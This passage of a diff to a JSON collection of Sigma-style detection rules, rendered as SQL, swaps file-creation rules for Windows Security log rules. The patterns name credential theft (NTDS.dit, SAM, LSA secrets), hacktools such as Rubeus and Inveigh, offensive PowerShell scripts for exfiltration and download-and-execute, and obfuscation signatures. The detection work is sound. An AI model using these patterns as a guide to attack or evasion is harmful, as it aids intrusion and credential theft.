'\\'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ + "attack.discovery", + "attack.t1012", "attack.credential_access", - "attack.t1003.003" + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access" + "attack.persistence", + "attack.lateral_movement", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "status": "experimental", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "status": "experimental", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.defense_evasion", + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1078" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE 